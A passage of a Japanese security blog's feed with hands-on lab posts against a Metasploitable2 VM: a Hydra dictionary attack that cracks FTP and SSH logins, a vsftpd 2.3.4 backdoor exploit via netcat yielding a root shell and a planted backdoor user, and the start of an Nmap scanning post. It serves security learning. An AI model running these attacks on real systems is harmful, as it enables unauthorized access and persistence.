internal-blogcard-snippet">Nmapを使いターゲットの空いているポートや、提供しているサービス、OS情報などを収集し、脆弱なサービスがないか調査します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.14</div></div></div></div></a>
</div>



<p><br><span class="bold-red">※注意事項※<br>このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。<br>他者の機器やネットワークで試すことは絶対にしないでください。</span><a href="https://eidoblog.com/caution/" data-type="URL" data-id="https://eidoblog.com/caution/">詳しくはこちら</a></p>



<h2 id="rtoc-2"  class="wp-block-heading">2.Hydra</h2>



<p><strong>Hydra</strong>とは、オンラインでパスワードをクラックする有名なツールです。<br>SSHやFTPアカウント、Webサービスのログインフォームに対してクラッキングできます。</p>



<p>今回の実験は辞書リストを作成し、ターゲットマシンへ<strong>辞書攻撃</strong>を行います。</p>



<h2 id="rtoc-3"  class="wp-block-heading">3.実験</h2>



<p>攻撃用マシン（Kali Linux）からターゲットマシン（Metasploitable2）へ攻撃します。</p>



<h3 id="rtoc-4"  class="wp-block-heading">3-1.実験環境</h3>



<p>この実験における環境は、次の通りです。</p>



<pre class="wp-block-verse">・Kali Linux（攻撃用マシン）<br>名前：kali<br>IPアドレス：192.168.238.128/24<br><br>・Metasploitable2（ターゲットマシン）<br>名前：metasploitable<br>IPアドレス：192.168.238.130/24</pre>



<p>※実験用マシンの準備は以下をご覧ください。 </p>



<p>　　・攻撃用マシン（Kali Linux）の構築</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/kali-vmware/" title="Kali Linux 2021.2 構築 攻撃用マシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="90" src="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-120x68.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-320x180.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Kali Linux 2021.2 構築 攻撃用マシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。Kali Linuxの準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.09</div></div></div></div></a>
</div>



<p>　　・ターゲットマシン（Metasploitable2）の構築</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/metasploitable-vmware/" title="Metasploitable2構築 ターゲットマシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="99" src="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-300x188.jpg 300w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1024x640.jpg 1024w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-768x480.jpg 768w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1536x960.jpg 1536w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-120x74.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-320x198.jpg 320w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920.jpg 1920w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Metasploitable2構築 ターゲットマシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。Metasploitable2の準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.11</div></div></div></div></a>
</div>



<h3 id="rtoc-5"  class="wp-block-heading">3-2.実験の用意</h3>



<p>Hydra使い<span class="marker-under">FTPアカウント</span>と<span class="marker-under-blue">SSHアカウント</span>を解析します。<br>まずは、<strong>ユーザリスト[user.lst]</strong>と<strong>パスワードリスト[pass.lst]</strong>を作成します。</p>



<p>・ユーザリストを作成<br>攻撃用マシンのターミナルから以下コマンドを実行し、ユーザ名を記述していきます。</p>



<pre class="wp-block-verse">kali:~$ cat > user.lst</pre>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ cat > user.lst
root
sys
msfadmin
admin
user
service
postgres
tomcat
eido
　　←[ctrl]+[c]で抜ける</pre>



<p><br><br>・パスワードリストを作成<br>  攻撃用マシンのターミナルから以下コマンドを実行し、パスワードを記述していきます。 </p>



<pre class="wp-block-verse">kali:~$ cat > pass.lst</pre>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ cat > pass.lst
user
password
12345678
msfadmin
root
guest
batman
asdfasdf
tomcat
eido
　　←[ctrl]+[c]で抜ける</pre>



<p><br>実験の用意は以上です。</p>



<h3 id="rtoc-6"  class="wp-block-heading">3-3.実験開始</h3>



<p><span class="marker-under"><strong>・FTPアカウントを解析します。</strong></span><br>攻撃用マシンのターミナルから以下コマンドを実行します。<br>※最後にターゲットIPとプロトコルを指定します。</p>



<pre class="wp-block-verse">kali:~$ hydra -L user.lst -P pass.lst -t 8 192.168.238.130 ftp</pre>



<p>-L：ユーザリストを指定[user.lst]<br>-P：パスワードリストを指定[pass.lst]<br>-t：並列処理のタスク数を指定　※デフォルトでは16ですが、ここでは8に下げました。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ hydra -L user.lst -P pass.lst -t 8 192.168.238.130 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 11:21:27
[DATA] max 8 tasks per 1 server, overall 8 tasks, 90 login tries (l:9/p:10), ~12 tries per task
[DATA] attacking ftp://192.168.238.130:21/
[21][ftp] host: 192.168.238.130   login: msfadmin   password: msfadmin
[21][ftp] host: 192.168.238.130   login: user   password: user
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 11:22:03</pre>



<p><strong>・結果</strong><br>ユーザ名：msfadmin　パスワード：msfadmin<br>ユーザ名：user　パスワード：user <br><br>FTPアカウントを<strong>2つ解析</strong>できました。<br></p>



<p><br><br><strong><span class="marker-under"><span class="marker-under-blue">・SSHアカウントを解析します</span></span>。</strong><br>FTPの辞書攻撃と同じ書式ですが、並列処理数を4、最後のプロトコルをsshにします。</p>



<pre class="wp-block-verse">kali:~$ hydra -L user.lst -P pass.lst -t 4 192.168.238.130 ssh</pre>



<p>また、プロトコルのポート番号が変更されている場合<br>次のような書式でも解析できます。</p>



<pre class="wp-block-verse">kali:~$ hydra -L user.lst -P pass.lst -t 4 ssh://192.168.238.130:22</pre>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ hydra -L user.lst -P pass.lst -t 4 192.168.238.130 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 11:25:14
[DATA] max 4 tasks per 1 server, overall 4 tasks, 90 login tries (l:9/p:10), ~23 tries per task
[DATA] attacking ssh://192.168.238.130:22/
[22][ssh] host: 192.168.238.130   login: sys   password: batman
[22][ssh] host: 192.168.238.130   login: msfadmin   password: msfadmin
[22][ssh] host: 192.168.238.130   login: user   password: user
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 11:25:50</pre>



<p> <strong>・結果</strong><br>ユーザ名：sys　パスワード：batman <br>ユーザ名：msfadmin　パスワード：msfadmin<br>ユーザ名：user　パスワード：user <br><br>SSHアカウントを<strong>3つ解析</strong>できました。 </p>



<p>実験は以上です。</p>



<h2 id="rtoc-7"  class="wp-block-heading">4.まとめ</h2>



<p>今回はオンラインパスワードクラックの実験を行いました。<br>ターゲットマシンは脆弱なアカウントを使っているため、辞書攻撃は約30秒程で終わり、<br>簡単なユーザ名、パスワードにしていると、すぐに解読されてしまうことがわかりました。<br><br>また、今回はリストを自作しましたが、Web上には有名な辞書ファイルがたくさんあります。<br>今回の実験を参考に、新しい実験を試してみてください。</p>



<h2 id="rtoc-8"  class="wp-block-heading">参考サイト、文献</h2>



<p><a href="https://rpx.a8.net/svt/ejp?a8mat=3HR0N6+CIP5PU+2HOM+BWGDT&amp;rakuten=y&amp;a8ejpredirect=https%3A%2F%2Fhb.afl.rakuten.co.jp%2Fhgc%2Fg00tzgs4.2bo110f3.g00tzgs4.2bo12bcc%2Fa21121298722_3HR0N6_CIP5PU_2HOM_BWGDT%3Fpc%3Dhttps%253A%252F%252Fitem.rakuten.co.jp%252Fpure-tree-trunk%252F202110150324589784798155302%252F%26m%3Dhttp%253A%252F%252Fm.rakuten.co.jp%252Fpure-tree-trunk%252Fi%252F10032940%252F">ハッキング ラボのつくりかた 仮想環境におけるハッカー体験学習</a></p>



<p>価格:<strong>6,335円</strong><br>(2021/12/16 01:03時点)</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>vsftpd 2.3.4 脆弱性　リモートから任意のコマンド実行</title>
		<link>https://eidoblog.com/vsftpd-234/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Wed, 15 Dec 2021 22:00:00 +0000</pubDate>
				<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=243</guid>

					<description><![CDATA[vsftp2.3.4の脆弱性を利用し、ターゲットマシンのバックドアから任意のコマンドを実行するハッキング実験を行います。]]></description>
										<content:encoded><![CDATA[
<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="243" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.目的</a></li><li class="rtoc-item"><a href="#rtoc-2">2.脆弱性について</a></li><li class="rtoc-item"><a href="#rtoc-3">3.実験</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-4">3-1.実験環境</a></li><li class="rtoc-item"><a href="#rtoc-5">3-2.実験開始</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-6">4.まとめ</a></li><li class="rtoc-item"><a href="#rtoc-7">参考サイト、文献</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.目的</h2>



<p>vsftp2.3.4の脆弱性を利用し、ターゲットマシンのバックドアから任意のコマンドを実行します。</p>



<p>基本的な攻撃の流れは以下の通りです。<br>1.情報調査ツールを使い、ターゲットの情報を収集　←nmapで収集<br><strong>2.脆弱なサービスを特定し、侵入　　　　　　　　　←今回の実験</strong></p>



<p>　　・nmapでの情報収集は以下の記事をご覧ください。</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/nmap/" title="Nmapでポートスキャンの実験&lt;br&gt;Kali Linux ツール" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="99" src="https://eidoblog.com/wp-content/uploads/2021/12/1826323_s-160x99.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/1826323_s-160x99.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/1826323_s-120x74.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/1826323_s-320x198.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Nmapでポートスキャンの実験<br>Kali Linux ツール</div><div class="blogcard-snippet internal-blogcard-snippet">Nmapを使いターゲットの空いているポートや、提供しているサービス、OS情報などを収集し、脆弱なサービスがないか調査します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.14</div></div></div></div></a>
</div>



<p><br><span class="bold-red">※注意事項※<br>このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。<br>他者の機器やネットワークで試すことは絶対にしないでください。</span><a href="https://eidoblog.com/caution/" data-type="URL" data-id="https://eidoblog.com/caution/">詳しくはこちら</a></p>



<h2 id="rtoc-2"  class="wp-block-heading">2.脆弱性について</h2>



<p>vsftp 2.3.4をExploit Databaseで検索すると、<br>「Backdoor Command Execution」という脆弱性があることがわかりました。</p>



<p>・Exploit Database<br><a rel="noopener" href="https://www.exploit-db.com/" target="_blank">https://www.exploit-db.com/</a><br><img decoding="async" width="700" height="161" class="wp-image-248" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/vsftp234.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/vsftp234.png 1809w, https://eidoblog.com/wp-content/uploads/2021/12/vsftp234-300x69.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/vsftp234-1024x235.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/vsftp234-768x176.png 768w, https://eidoblog.com/wp-content/uploads/2021/12/vsftp234-1536x352.png 1536w" sizes="(max-width: 700px) 100vw, 700px" /></p>



<p>解説によると、<br>vsftpd 2.3.4にはリモートからコマンド実行を可能とするバックドアが含まれているようです。<br><span class="bold-blue">「:)」を含むユーザ名でFTPにログイン</span>すると、<span class="bold-green">ポート6200にバックドア</span>が開きます。<br>ポート6200(TCP)にアクセスすることで、vsftpdの実行権限で任意のコマンドを実行できるようです。</p>



<h2 id="rtoc-3"  class="wp-block-heading">3.実験</h2>



<p>攻撃用マシン（Kali Linux）からターゲットマシン（Metasploitable2）へ侵入します。</p>



<h3 id="rtoc-4"  class="wp-block-heading">3-1.実験環境</h3>



<p>この実験における環境は、次の通りです。</p>



<pre class="wp-block-verse">・Kali Linux（攻撃用マシン）
名前：kali
IPアドレス：192.168.238.128/24

・Metasploitable2（ターゲットマシン）
名前：metasploitable
IPアドレス：192.168.238.130/24</pre>



<p>※実験用マシンの準備は以下ご参照ください。</p>



<p>　　・攻撃用マシン（Kali Linux）の構築</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/kali-vmware/" title="Kali Linux 2021.2 構築 攻撃用マシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="90" src="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-120x68.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-320x180.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Kali Linux 2021.2 構築 攻撃用マシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。Kali Linuxの準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.09</div></div></div></div></a>
</div>



<p>　　・ターゲットマシン（Metasploitable2）の構築</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/metasploitable-vmware/" title="Metasploitable2構築 ターゲットマシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="99" src="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-300x188.jpg 300w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1024x640.jpg 1024w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-768x480.jpg 768w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1536x960.jpg 1536w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-120x74.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-320x198.jpg 320w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920.jpg 1920w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Metasploitable2構築 ターゲットマシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。Metasploitable2の準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.11</div></div></div></div></a>
</div>



<h3 id="rtoc-5"  class="wp-block-heading">3-2.実験開始</h3>



<p>まず、ターゲットマシン上のポート6200（TCP）は開いていません。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfadmin@metasploitable:~$ netstat -na | grep 6200
(出力なし)</pre>



<p><br>では、攻撃用マシン（Kali Linux）からターゲットマシンの<br><span class="bold-blue">ポート21（FTP）にアクセスしてみます。※「:)」を含むユーザ名</span></p>



<pre class="wp-block-verse">$ nc  192.168.238.130 21</pre>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ nc 192.168.238.130 21
220 (vsFTPd 2.3.4)
User 1234:)　　←Userコマンドを入力し、「:)」を含めたユーザ名を入力する
331 Please specify the password.
Pass hoge　　　←Passコマンドを入力し、適当な文字列を入力する
</pre>



<p>「1234:)」なんてユーザはいないので、もちろんログインは失敗します。<br>しかし、ログインを試みた時点でターゲットマシンの<span class="bold-green">ポート6200（TCP）が開いている</span>ことがわかります。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfadmin@metasploitable:~$ netstat -na | grep 6200
tcp　　　　　0　　　　0 0.0.0.0:6200　　　　　 0.0.0.0:*　　　　　　LISTEN</pre>



<p><br><br>攻撃用マシン（Kali Linux）で別のターミナルを起動し、<br>ターゲットマシンのポート6200にアクセスします。<br>すると、プロンプトは返ってこないが、任意のコマンドを実行できることがわかります。</p>



<pre class="wp-block-verse">$ nc -nv 192.168.238.130 6200</pre>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ nc -nv 192.168.238.130 6200
(UNKNOWN) [192.168.238.130] 6200 (?) open
whoami　　←whoamiコマンドを入力すると、rootが返ってくる
root</pre>



<p>root権限なのでほとんどのコマンドが通ります。<br>例えば、バックドア用の新しいユーザを作成し、いつでも侵入できるようにすることも可能です。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─$ nc -nv 192.168.238.130 6200
(UNKNOWN) [192.168.238.130] 6200 (?) open
whoami
root
useradd -m eido -G sudo -s /bin/bash; passwd newuser　←新しいユーザ作成
Enter new UNIX password: eido
Retype new UNIX password: eido
passwd: password updated successfully
exit</pre>



<p><br>これが今回の脆弱性となります。</p>



<h2 id="rtoc-6"  class="wp-block-heading">4.まとめ</h2>



<p>先ほど紹介したサイト（Exploit Database）を確認すると、<br>Metasploitに含まれているソースコードを確認することができます。<br>ソースコードは結構長く記述されてますが、ポイントとなる攻撃の流れを確認するだけであれば、<br>細かい文法を気にする必要はありません。<br>他にも様々なExploitが載っており、見ているだけで勉強になると思います。</p>



<h2 id="rtoc-7"  class="wp-block-heading">参考サイト、文献</h2>



<p><a href="https://rpx.a8.net/svt/ejp?a8mat=3HR0N6+CIP5PU+2HOM+BWGDT&amp;rakuten=y&amp;a8ejpredirect=https%3A%2F%2Fhb.afl.rakuten.co.jp%2Fhgc%2Fg00tzgs4.2bo110f3.g00tzgs4.2bo12bcc%2Fa21121298722_3HR0N6_CIP5PU_2HOM_BWGDT%3Fpc%3Dhttps%253A%252F%252Fitem.rakuten.co.jp%252Fpure-tree-trunk%252F202110150324589784798155302%252F%26m%3Dhttp%253A%252F%252Fm.rakuten.co.jp%252Fpure-tree-trunk%252Fi%252F10032940%252F">ハッキング ラボのつくりかた 仮想環境におけるハッカー体験学習</a></p>



<p>価格:<strong>6,335円</strong><br>(2021/12/16 01:03時点)</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Nmapでポートスキャンの実験Kali Linux ツール</title>
		<link>https://eidoblog.com/nmap/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Mon, 13 Dec 2021 16:46:38 +0000</pubDate>
				<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=192</guid>

					<description><![CDATA[Nmapを使いターゲットの空いているポートや、提供しているサービス、OS情報などを収集し、脆弱なサービスがないか調査します。]]></description>
										<content:encoded><![CDATA[
<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="192" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.目的</a></li><li class="rtoc-item"><a href="#rtoc-2">2.機能</a></li><li class="rtoc-item"><a href="#rtoc-3">3.使用方法/オプション</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-4">3-1.使用方法</a></li><li class="rtoc-item"><a href="#rtoc-5">3-2.オプション例</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-6">4.実験</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-7">4-1.実験環境</a></li><li class="rtoc-item"><a href="#rtoc-8">4-2.実験開始</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-9">6.まとめ</a></li><li class="rtoc-item"><a href="#rtoc-10">参考サイト、文献</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.目的</h2>



<p>Nmapを使いターゲットの空いているポートや、提供しているサービス、OS情報などを収集し、<br>脆弱なサービスがないか調査します。</p>



<p>基本的な攻撃の流れは以下の通りです。<br>1.情報調査ツールを使い、ターゲットの情報を収集　<strong>←nmapで収集</strong><br>2.脆弱なサービスを特定し、侵入</p>



<p><span class="bold-red">※</span><span class="bold-red">注意事項※<br>このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。<br>他者の機器やネットワークで試すことは絶対にしないでください。</span><a href="https://eidoblog.com/caution/" data-type="URL" data-id="https://eidoblog.com/caution/">詳しくはこちら</a></p>



<h2 id="rtoc-2"  class="wp-block-heading">2.機能</h2>



<p><strong>Nmap（Network Mapper）</strong>は、ネットワークの調査や監査に使用するツールです。<br>ネットワーク上の接続可能なホストや実行しているOS、サービスのバージョンなどを<br>調査することができます。<br><br>この調査はセキュリティが正常に機能しているか、確認することを目的としています。<br>他者のサーバ機器にスキャンを行うと不正アクセスに該当する可能性があるため、注意が必要です。</p>



<h2 id="rtoc-3"  class="wp-block-heading">3.使用方法/オプション</h2>



<h3 id="rtoc-4"  class="wp-block-heading">3-1.使用方法</h3>



<p>Windowsの場合はnmapをインストールする必要がありますが、<br>Kali Linuxの場合はデフォルトで使用可能です。</p>



<p>使用方法はターミナルで<span class="marker">nmap &lt;ターゲットのIP情報&gt; </span>を入力するだけです。</p>



<h3 id="rtoc-5"  class="wp-block-heading">3-2.オプション例</h3>



<p>オプションを追加することで、ポートスキャン方法を変更することができます。</p>



<figure class="wp-block-table is-style-regular"><table><thead><tr><th> オプション </th><th> 使い方 </th></tr></thead><tbody><tr><td>-sP</td><td>Pingスキャン</td></tr><tr><td>-sV</td><td> サービスのバージョンを検出 </td></tr><tr><td>-O</td><td>OSの特定</td></tr><tr><td>-A</td><td>OSの特定とバージョンを検出</td></tr><tr><td>-sT</td><td>TCP Connect スキャン</td></tr><tr><td>-sU</td><td>UDPスキャン</td></tr><tr><td>-oN &lt;file&gt;</td><td>通常出力</td></tr></tbody></table></figure>



<h2 id="rtoc-6"  class="wp-block-heading">4.実験</h2>



<p>攻撃用マシン（Kali Linux）からターゲットマシン（Metasploitable2）へスキャンします。</p>



<h3 id="rtoc-7"  class="wp-block-heading">4-1.実験環境</h3>



<p>この実験における環境は、次の通りです。</p>



<pre class="wp-block-preformatted">・Kali Linux（攻撃用マシン）
名前：kali
